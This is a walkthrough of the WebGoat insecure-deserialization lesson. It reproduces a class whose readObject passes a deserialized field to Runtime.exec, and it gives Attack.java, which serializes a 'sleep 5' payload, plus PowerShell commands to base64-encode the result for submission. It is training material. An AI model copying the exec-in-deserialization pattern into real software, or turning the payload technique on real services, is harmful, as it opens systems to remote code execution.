Try to change this serialized object in order to delay the page response for exactly 5 seconds.
Solution
Hints: WebGoat probably contains the org.dummy.insecure.framework.VulnerableTaskHolder class as shown on the lesson pages. Use this to construct and serialize your attack. The VulnerableTaskHolder might have been updated on the server with the next version number. Not all actions are allowed anymore. The readObject has been changed. For serializing it does not effect the data. Follow the additional hints from the feedback on your attempts.
In order to create the attack we need to follow this 4 steps: clone the code at the WebGoat repository, compile the necessary classes, run the attack to serialized the object, and convert the token into base64. Let's break down the process:
cd WebGoat/webgoat-lessons/insecure-deserialization/src/main/java/org/owasp/webgoat/deserialization
This file contains the endpoint used by WebGoat to check your token for completing the lesson.
b) Compile the necessary classes (VulnerableTaskHolder, Attack).
Go into the VulnerableTaskHolder java file.
cd WebGoat/webgoat-lessons/insecure-deserialization/src/main/java/org/dummy/insecure/framework
package org.dummy.insecure.framework;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.ObjectInputStream;
import java.io.Serializable;
import java.time.LocalDateTime;
public class VulnerableTaskHolder implements Serializable {
private static final long serialVersionUID = 2;
private String taskName;
private String taskAction;
private LocalDateTime requestedExecutionTime;
public VulnerableTaskHolder(String taskName, String taskAction) {
super();
this.taskName = taskName;
this.taskAction = taskAction;
this.requestedExecutionTime = LocalDateTime.now();
}
@Override
public String toString() {
return "VulnerableTaskHolder [taskName=" + taskName + ", taskAction=" + taskAction + ", requestedExecutionTime="
+ requestedExecutionTime + "]";
}
private void readObject(ObjectInputStream stream) throws Exception {
stream.defaultReadObject();
if (requestedExecutionTime != null &&
(requestedExecutionTime.isBefore(LocalDateTime.now().minusMinutes(10))
|| requestedExecutionTime.isAfter(LocalDateTime.now()))) {
throw new IllegalArgumentException("outdated");
}
if ((taskAction.startsWith("sleep") || taskAction.startsWith("ping"))
&& taskAction.length() < 22) {
try {
Process p = Runtime.getRuntime().exec(taskAction);
BufferedReader in = new BufferedReader(
new InputStreamReader(p.getInputStream()));
String line = null;
while ((line = in.readLine()) != null) {
// log.info(line);
}
} catch (IOException e) {
// log.error("IO Exception", e);
}
}
}
}
Compile the file
javac VulnerableTaskHolder.java
Create and compile "Attack.java".
package org.dummy.insecure.framework;
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
public class Attack {
public static void main(String[] args) throws Exception {
VulnerableTaskHolder vulnObj = new VulnerableTaskHolder("dummy", "sleep 5");
FileOutputStream fos = new FileOutputStream("serial");
ObjectOutputStream os = new ObjectOutputStream(fos);
os.writeObject(vulnObj);
os.close();
}
}
Compile the "Attack.java" file
javac Attack.java
c) Run Attack.java to Generate the Serialized Object
java org.dummy.insecure.framework.Attack
d) Convert the serialized object to Base64 and submit it to complete the lesson
Running Attack.class creates serial file which needs to be converted to base64 by means of the following command in power shell:
# Read the binary content of the file
$fileContent = Get-Content -Path "serial" -Encoding Byte
# Convert the binary content to a Base64 string
$base64String = [System.Convert]::ToBase64String($fileContent)
# Print the Base64 string
$base64String
Copy the Base64 token and submit it in the WebGoat lesson form to complete the exercise.
